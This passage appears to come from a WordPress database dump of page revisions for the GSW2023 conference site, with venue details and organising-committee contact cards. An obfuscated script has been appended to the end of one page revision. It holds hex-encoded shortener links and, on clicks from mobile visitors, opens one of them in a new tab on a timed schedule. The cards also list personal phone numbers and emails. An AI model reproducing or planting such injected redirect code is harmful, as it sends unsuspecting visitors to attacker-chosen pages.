responsiveness=\"post_width_based\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-10 00:23:05','2023-07-10 00:23:05','',3066,'https://gsw2023.com/?p=4977',0,'revision','',0),
(4978,1,'2023-07-10 00:29:47','2023-07-10 00:29:47','<p>[vc_row css=\".vc_custom_1687871707649{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1687871751542{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687871759816{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Chairman</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\nVice President for Post Graduate and Scientific Research<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table style=\"margin: 0px; padding: 0px;\">\n<tbody>\n<tr>\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:aaelbary@gsw2023.com\"> aaelbary@gsw2023.com </a></td>\n<td style=\"width: 26%;\"><a href=\"mailto:gsw2023@aast.edu\"> gsw2023@aast.edu </a></td>\n</tr>\n<tr>\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\n<td style=\"width: 26%;\">Office: <a href=\"tel:+2035497598\">+203 5497598</a></td>\n<td style=\"width: 26%;\">Fax: <a href=\"tel:+2035497598\"> +203 5497598 </a></td>\n<td style=\"width: 26%;\">Mobile: <a href=\"tel:+201007382198\"> +20 100 7382 198 </a></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871606693{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1687943626436{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687945134205{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\n<span style=\"font-size: 9pt;\"><a href=\"mailto:nashwa.elbendary@aast.edu\"> nashwa.elbendary@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:ymohasseb@aast.edu\"> ymohasseb@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201227217550\">+ 201227217550 </a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:amzak10@aast.edu\"> amzak10@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201006619608\">+201006619608</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto:radwa.ahmed@aast.edu\">radwa.ahmed@aast.edu</a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201001552854\">+201001552854</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column css=\".vc_custom_1687871596223{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688948980510{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>GSW\'2023 IT</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871361897{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687871425647{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1688129113852{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ayman_elzagh.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Research Eng. Ayman Elzagh</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Web Director<br />\nGSW2023, Egypt<br />\n<span style=\"font-size: 11pt;\"><a href=\"mailto:ayzagh@aast.edu\">ayzagh@aast.edu</a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201210007979\">+201210007979</a></span></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871435951{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;}\"][vc_column_text css=\".vc_custom_1687944881119{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/avatar.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Ahmed ElGamal </strong></em></span><br />\n<span style=\"font-size: 12pt;\">gamal97@gmail.com </span><br />\n<span style=\"font-size: 12pt;\">+201001610401</span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/3\" css=\".vc_custom_1687871462058{margin-bottom: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-right: 5px !important;padding-bottom: 0px !important;padding-left: 5px !important;border-left-color: rgba(0,0,0,0.01) !important;border-right-color: rgba(0,0,0,0.01) !important;border-top-color: rgba(0,0,0,0.01) !important;border-bottom-color: rgba(0,0,0,0.01) !important;}\" el_class=\"gsw-no-border\"][vc_column_text css=\".vc_custom_1688033360493{margin-top: 0px !important;margin-right: 0px !important;margin-bottom: 0px !important;margin-left: 0px !important;border-top-width: 0px !important;border-right-width: 0px !important;border-bottom-width: 0px !important;border-left-width: 0px !important;padding-top: 0px !important;padding-right: 0px !important;padding-bottom: 0px !important;padding-left: 0px !important;border-left-color: rgba(255,255,255,0.01) !important;border-right-color: rgba(255,255,255,0.01) !important;border-top-color: rgba(255,255,255,0.01) !important;border-bottom-color: rgba(255,255,255,0.01) !important;}\" el_class=\"gsw_card\"]</p>\n<table>\n<tbody>\n<tr>\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/nagy.jpeg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Eng. Nagy K. Aly</strong></em></span><br />\n<span style=\"font-size: 12pt;\">Security Engineer</span><br />\n<span style=\"font-size: 12pt;\"><a href=\"mailto: nagy@aast.edu\"> nagy@aast.edu </a></span><br />\n<span style=\"font-size: 12pt;\"><a href=\"tel:+201141606029\">+201141606029</a></span></td>\n</tr>\n</tbody>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687871347747{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column css=\".vc_custom_1687861905334{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_text css=\".vc_custom_1687861705937{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 12pt;\">Arab Academy for Science &amp; Technology &amp; Maritime Transport</span></strong><br />\n<strong><span style=\"font-size: 12pt;\">P.O.Box: 1029 Alexandria Egypt</span></strong>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687872978322{margin-bottom: 10px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687872285543{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Hotels Reservation and Public Relations</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"4936\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"img_card_2\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Mr. Yasser Elrashidi</strong></em></span><br />\nDirector of Events and conferences Department<br />\nArab Academy for Science, Technology and Maritime Transport<br />\nP.O.Box 1029, Alexandria, Egypt</p>\n<table>\n<tr>\n<td>Email:</td>\n<td>yasserelrashidi@aast.edu</td>\n</tr>\n<tr>\n<td>Mobile:</td>\n<td>+201270059999</td>\n</tr>\n</table>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1687873543921{margin-bottom: 10px !important;}\"][vc_column][vc_column_text css=\".vc_custom_1687873078553{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: 